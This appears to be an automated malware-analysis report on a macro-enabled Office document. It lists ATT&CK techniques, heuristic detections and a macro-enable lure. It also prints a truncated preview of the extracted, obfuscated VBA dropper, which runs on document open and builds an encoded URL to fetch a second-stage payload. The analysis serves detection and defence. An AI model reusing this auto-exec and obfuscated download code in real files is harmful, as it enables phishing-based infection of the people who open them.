MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and CallByName functions. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The presence of a macro-enable lure further supports this malicious intent. No specific family could be identified due to the obfuscated nature of the script.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15570 bytes |
SHA-256: 89098a53af55e458bf01a7445aed6776524a11de35385773e18f17ea39f4aba5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function wnTsK(ByVal QkPGagu As String, ByVal DsyfrqCoLbrYJU As String) As Integer
EXoFZ
AelmUimFub = 6891
bYETwdlDscYAv 4165
HDRplQmUzeb 7578, "LDe6L3M8mi3Wnoumg687Vmr2"
If ymRVulRyqt Then
isSlmidTyrGx "dWtamZlOPb4hwN8P36zK1kW8", True, "59i8SxzSBAKVrbTWFSpw1ufK"
abdsjbW "AlhLjOHPyUUVg14aynfXqwP4TA8z", True
zUwtnekfJOckQv
Else
KQzllfqj 1146
End If
wnTsK = 5291
End Function
Private Sub VOzpTzBXn(ByVal kXWmkMWW As String, ByVal uKhaOvn As Integer)
baBRXxceVv "qfj8ZuNHXvdlMbmjU5bqtE", 5222, True
VONOshmyaqJzo
dpYQMgLtS 7063
End Sub
Private Function QdiEhmxo() As String
If sRrQmYWJ Then
QEIBC
Else
moVhRjmyj 2523
End If
QdiEhmxo = "cUDdIBA4ovRMcNT25q"
End Function
Private Sub Document_Open()
Dim pRQUtFdyRapK As String
zXmHXwGmubk = 5132
ckKjyZOabwxN.cMMuFneXrhJYZy
End Sub
Private Function LKtFCToxuiI(ByVal eXxcvLtMTnLeJ As Integer, ByVal dYFqhO As String) As Boolean
qCVUDVpBYXRGYS 564, 1218, "G397G8wcYANYhLgnAIhF03b65GmJAmc"
nlXvEZYvXBN = 5855
lOgSwvHtInyw 1901, "QEsqb4q8RXJOXrOvoQ0skmAq"
UlSLILPDHjZDgf 7473
vWWyxC 238, "6mLQoGAIV4Iyz47kM74Mifq5ZYPGSW", "lGLx1SX7z6atKGawMHK"
LKtFCToxuiI = False
End Function
Attribute VB_Name = "ckKjyZOabwxN"
Private Sub xotLIotwzVF()
Dim uPxRSZTEGQ As Integer
TKAvmItwrh = 7110
kyfpPWBQFjrut xpJgn.RszfFNCaglBDL, 1503, ukOfHaSQI
xpJgn.jiamRfMMAtUxbH xpJgn.RszfFNCaglBDL
End Sub
Public Sub cMMuFneXrhJYZy()
bvoRtxYQQpv = 4891
On Error GoTo wIdGEcfVPdD
DiWkWGYQi.nnxfyc
DiWkWGYQi.zHKPdHCSvt
xotLIotwzVF
Exit Sub
wIdGEcfVPdD:
End Sub
Private Sub kyfpPWBQFjrut(ByVal oAyqyVamVb As String, ByVal kGmhy As Integer, ByVal HBwmTicmkjroP As String)
Dim GDBBr As Integer
Set GRKcQRqvLq = kPdsHUKjTYui.MllfVlZYsX("MUirHzxmr87rkhWsj3uuvzXd8pES", HBwmTicmkjroP, "U8rdFuy70Kw6Klsn0hZqOFf")
kPdsHUKjTYui.yNslYcdFsHbWpc GRKcQRqvLq, AHvdTifo.RWgmVCt("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
xpJgn.tHAtqOgP oAyqyVamVb, PcXVRMMDsoNTyq.SSNroUnn(GRKcQRqvLq, AHvdTifo.RWgmVCt("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function WBTzPIB(ByVal RrBfbwRqTGy As String, ByVal vptnVztIocKij As String) As Object
Dim AyVfllIPUP As String
Dim UQDeMEjNRzTOi As String
Set WBTzPIB = gunLTmBRfz(CreateObject(vptnVztIocKij), False, False)
End Function
Private Function gunLTmBRfz(ByVal XBMCNLEPYU As Object, ByVal WftVz As Boolean, ByVal bMWaKHTMH As Boolean) As Object
Set gunLTmBRfz = XBMCNLEPYU
End Function
Private Function ukOfHaSQI() As String
ukOfHaSQI = AHvdTifo.RWgmVCt("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "AHvdTifo"
Public Function RWgmVCt(ByVal OUMvapJnUK As String, ByVal UGBREEU As String) As String
Dim UmLiXks As Boolean
For TPlidrtAU = lWlZEcqujniXJf To ENyABmg.HOAgwLfF("GYzlQ9QEmXrzYPwBeHx1PuzqJ5Fl73ky", OUMvapJnUK)
RWgmVCt = ENyABmg.zNfbzhUzud("dsRHvcN8eGHsFWY8AcM0rYvRSBTwWdNTA", RWgmVCt, 8054, OQdtY(UGBREEU, ENyABmg.qNYAgp(TPlidrtAU, "14dhLdqZKLBKNSPR5PN0", OUMvapJnUK)))
Next
End Function
Private Sub GyWdeJKpAcD(ByVal FFaUsNhB As Boolean)
HyLQtGJ = "bZrCH995SnNAf4dHknXoSsDUM"
QKedzcPo 4633, "SxfqDb5N5BmN6pmBGlRCjBt"
rCJaN "EPMuz672uFkbZdwb30cljsTq", "yM5gfDz0UfQISPztVmQWsii1", "zFHj6los5n1z9Np8JbmW0qfcTmehjljN"
TgyWpBlMe = False
lRmVnzo "SoFYFwnN254rINQooVpf"
aChCU 7882
LvjiCNCdlg = 779
VkjVpIogMkzp
End Sub
Private Sub TfJsX()
If FZizwHuhGEBNXe Then
NCOZbQ
ZsGbV = "hMEPZlixL61qckPUxouHUCXyN"
End If
End Sub
Private Function OQdtY(ByVal FlGjPZGcoE As String, ByVal aGrtLvXDMz As String) As String
Dim JSsopXLGJjoij As Integer
Dim bRxPoCZJoJMRSF As String
If Not ENyABmg.xisckvc(aGrtLvXDMz, "vS1Y7HwjHu3H6vNpiWn3GUhQtBfBSPj", FlGjPZGcoE, 4638) Then
OQdtY = aGrtLvXDMz
End If
End Function
Private Function lWlZEcqujniXJf()
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.